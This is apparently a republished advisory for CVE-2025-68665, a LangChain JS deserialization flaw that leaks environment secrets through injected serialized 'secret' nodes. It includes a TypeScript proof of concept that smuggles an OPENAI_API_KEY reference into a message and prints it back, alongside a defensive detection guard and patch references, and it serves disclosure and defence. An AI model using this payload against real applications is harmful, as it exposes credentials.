CVE-2025-68665: LangChain serialization injection vulnerability enables secret extraction
Attackers who control serialized data can extract environment-variable secrets by injecting {"lc": 1, "type": "secret", "id": ["ENV_VAR"]} nodes, which the loader resolves from the environment during deserialization when secretsFromEnv: true is set. They can also inject constructor structures to instantiate any class within the provided import maps with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.
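To make the payload shape concrete, a minimal sketch of the attack path follows. The JSON structure is taken from the advisory, and load() is the real @langchain/core/load export; the exact shape of the secretsFromEnv option is taken from the advisory text and should be treated as an assumption, not a confirmed signature.

```typescript
import { load } from "@langchain/core/load";

// Attacker-controlled JSON: a normal-looking AIMessage whose
// additional_kwargs smuggles a "secret" node. On vulnerable versions
// the loader resolves that node against the environment at
// deserialization time.
const untrusted = JSON.stringify({
  lc: 1,
  type: "constructor",
  id: ["langchain_core", "messages", "AIMessage"],
  kwargs: {
    content: "hello",
    additional_kwargs: {
      // Injected secret reference (per the advisory's payload format).
      exfil: { lc: 1, type: "secret", id: ["OPENAI_API_KEY"] },
    },
  },
});

// On @langchain/core < 1.1.8 with secretsFromEnv enabled (option name
// per the advisory), the revived object can carry the plaintext value
// of process.env.OPENAI_API_KEY.
const revived = await load(untrusted, { secretsFromEnv: true });
console.log(JSON.stringify(revived));
```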
Key severity factors:
- Affects the serialization path: applications that trust their own serialization output are still vulnerable, because injected structures survive a serialize/deserialize round trip
- Enables secret extraction when combined with secretsFromEnv: true
- LLM responses in additional_kwargs can be controlled via prompt injection (see the defensive sketch after this list)
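The durable fix is upgrading to the patched releases linked below (@langchain/core 1.1.8, langchain 1.2.3). As a stopgap illustrating the factors above, here is a sketch of a hypothetical pre-flight guard that rejects untrusted payloads containing serialized secret references before they reach the deserializer; assertNoSecretNodes and containsSecretNode are our names, not a langchainjs API.

```typescript
// Walk an untrusted payload and flag any node that matches the
// serialized secret format, so deserialization can never be tricked
// into an environment lookup.
function containsSecretNode(value: unknown): boolean {
  if (Array.isArray(value)) return value.some(containsSecretNode);
  if (value !== null && typeof value === "object") {
    const node = value as Record<string, unknown>;
    if (node.lc === 1 && node.type === "secret") return true;
    return Object.values(node).some(containsSecretNode);
  }
  return false;
}

export function assertNoSecretNodes(untrustedJson: string): void {
  const parsed = JSON.parse(untrustedJson);
  if (containsSecretNode(parsed)) {
    throw new Error(
      "Refusing to deserialize payload with embedded secret reference"
    );
  }
}
```

A guard like this only addresses the secret-extraction vector; it does not constrain constructor injection, which is why upgrading remains the real mitigation.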
References
- github.com/advisories/GHSA-r399-636x-v7f6
- github.com/langchain-ai/langchainjs
- github.com/langchain-ai/langchainjs/commit/e5063f9c6e9989ea067dfdff39262b9e7b6aba62
- github.com/langchain-ai/langchainjs/releases/tag/%40langchain%2Fcore%401.1.8
- github.com/langchain-ai/langchainjs/releases/tag/langchain%401.2.3
- github.com/langchain-ai/langchainjs/security/advisories/GHSA-r399-636x-v7f6
- nvd.nist.gov/vuln/detail/CVE-2025-68665
Detect and mitigate CVE-2025-68665 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities.